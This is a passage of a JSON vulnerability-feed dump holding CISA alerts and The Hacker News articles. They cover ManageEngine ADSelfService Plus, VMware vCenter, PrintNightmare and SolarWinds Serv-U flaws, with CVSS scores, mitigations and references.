\n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. 
CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", 
"id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. Additionally, CISA strongly urges organizations to ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", 
"title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. 
See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. 
Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. 
As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities 
were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. 
\"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nFollowing the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), a configuration under which malicious printer drivers could potentially be installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. 
Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "Microsoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the 
issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. 
When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep dive into a Print Spooler RCE flaw on GitHub, along with fully working PoC code, before it was taken down just hours after it went up.\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 on the grounds that the fix for the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending that users disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface, and as an alternative to completely disabling printing, the company is also advising administrators to check group membership and nested group membership, reduce membership as much as possible, or completely empty the groups where possible.\n", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-06T10:35:28", "description": "Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with \"high 
confidence\" to a threat actor operating out of China.\n\nIn mid-July, the Texas-based company [remedied](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>) a remote code execution flaw ([CVE-2021-35211](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>)) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\n\"The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration,\" Microsoft Offensive Research and Security Engineering team said in a [detailed write-up](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) describing the exploit.\n\n\"An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. 
When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported,\" the researchers added.\n\nWhile Microsoft [linked](<https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html>) the attacks to DEV-0322, a China-based collective, citing \"observed victimology, tactics, and procedures,\" the company has now revealed that the remote, pre-auth vulnerability stemmed from the way the Serv-U process handled access violations without terminating, which made stealthy, reliable exploitation attempts simple to pull off.\n\n\"The exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context,\" the researchers said. \"This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages.\"\n\n\"Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. 
We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation,\" the researchers added.\n\nASLR refers to a [protection mechanism](<https://www.fireeye.com/blog/threat-research/2020/03/six-facts-about-address-space-layout-randomization-on-windows.html>) that's used to increase the difficulty of performing a buffer overflow attack by randomly arranging the address space positions where system executables are loaded into memory.\n\nMicrosoft, which reported the vulnerability to SolarWinds, said it recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. \"ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U,\" the researchers said.\n\nIf anything, the revelations highlight the variety of techniques and tools used by threat actors to breach corporate networks, including piggybacking on legitimate software.\n\nAlthough the SolarWinds supply chain attacks have been formally pinned on Russian APT29 hackers, Microsoft in December 2020 disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. Cybersecurity firm Secureworks connected the intrusions to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-04T07:50:00", "type": "thn", "title": "Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-06T10:12:29", "id": "THN:D84F06239D4B68B06712C485E00D6D1F", "href": "https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "SolarWinds, the Texas-based company that became the epicenter of a [massive supply chain attack](<https://thehackernews.com/2021/04/researchers-find-additional.html>) late last year, has issued patches to contain a 
remote code execution flaw in its Serv-U managed file transfer service.\n\nThe fixes, which target Serv-U Managed File Transfer and Serv-U Secure FTP products, arrive after Microsoft notified the IT management and remote monitoring software maker that the flaw was being exploited in the wild. The threat actor behind the exploitation remains unknown as yet, and it isn't clear exactly how the attack was carried out.\n\n\"Microsoft has provided evidence of limited, targeted customer impact, though SolarWinds does not currently have an estimate of how many customers may be directly affected by the vulnerability,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in an advisory published Friday, adding it's \"unaware of the identity of the potentially affected customers.\"\n\nImpacting Serv-U versions 15.2.3 HF1 and before, a successful exploitation of the shortcoming ([CVE-2021-35211](<https://nvd.nist.gov/vuln/detail/CVE-2021-35211>)) could enable an adversary to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\nAs indicators of compromise, the company is urging administrators to watch out for potentially suspicious connections via SSH from the IP addresses 98[.]176.196.89 and 68[.]235.178.32, or via TCP 443 from the IP address 208[.]113.35.58. 
Disabling SSH access on the Serv-U installation also prevents compromise.\n\nThe issue has been addressed in [Serv-U version 15.2.3 hotfix (HF) 2](<https://customerportal.solarwinds.com/>).\n\nSolarWinds also stressed in its advisory that the vulnerability is \"completely unrelated to the SUNBURST supply chain attack\" and that it does not affect other products, notably the Orion Platform, which suspected Russian hackers exploited to drop malware and dig deeper into targeted networks, spying on multiple federal agencies and businesses in one of the most serious security breaches in U.S. history.\n\nA string of [software supply chain attacks](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) since then has highlighted the fragility of modern networks and the sophistication with which threat actors identify hard-to-find vulnerabilities in widely used software to conduct espionage and drop ransomware, in which hackers shut down businesses' systems and demand payment to let them regain control.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T03:58:00", "type": "thn", "title": "A New Critical SolarWinds Zero-Day Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T03:18:35", "id": "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "href": "https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 